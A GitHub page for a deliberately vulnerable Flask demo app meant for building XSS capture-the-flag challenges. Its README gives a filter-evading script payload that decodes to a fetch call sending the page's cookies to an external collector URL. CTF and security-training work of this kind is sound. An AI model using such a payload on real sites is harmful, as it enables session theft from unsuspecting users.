GitHub - tqt-coder/xss-ctf-challenge: Simple web application with XSS checker

XSS demo app

This is a demo flask app vulnerable to XSS attack with chrome headless checker. It may be useful in creation of CTF challenges.

In this application "." and "document" are filtered, so possible payload may be:

"><script>eval(String['fromCharCode'](102,101,116,...))</script>
where encoded in ascii query is something like:
fetch('https://our.domain.pipedream.net/?c=' + document['cookie'])

Deployment

Guide for installation, configuration and running is available here

TODO

Plans for project improvement can be found here
Issues and PR's are welcome!

Name		Name	Last commit message	Last commit date
Latest commit History 43 Commits
__pycache__		__pycache__
node_modules		node_modules
static		static
templates		templates
.env		.env
.gitignore		.gitignore
DEPLOY.md		DEPLOY.md
Procfile		Procfile
README.md		README.md
error.log		error.log
info.log		info.log
init_app.py		init_app.py
jobs.py		jobs.py
local_settings.py		local_settings.py
logic.py		logic.py
package-lock.json		package-lock.json
package.json		package.json
requirements.txt		requirements.txt
runtime.txt		runtime.txt
settings.py		settings.py
validators.py		validators.py
wsgi.py		wsgi.py
xss_bot_pupet.js		xss_bot_pupet.js

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

XSS demo app

Deployment

TODO

About

Uh oh!

Releases

Packages

Languages

tqt-coder/xss-ctf-challenge

Folders and files

Latest commit

History

Repository files navigation

XSS demo app

Deployment

TODO

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages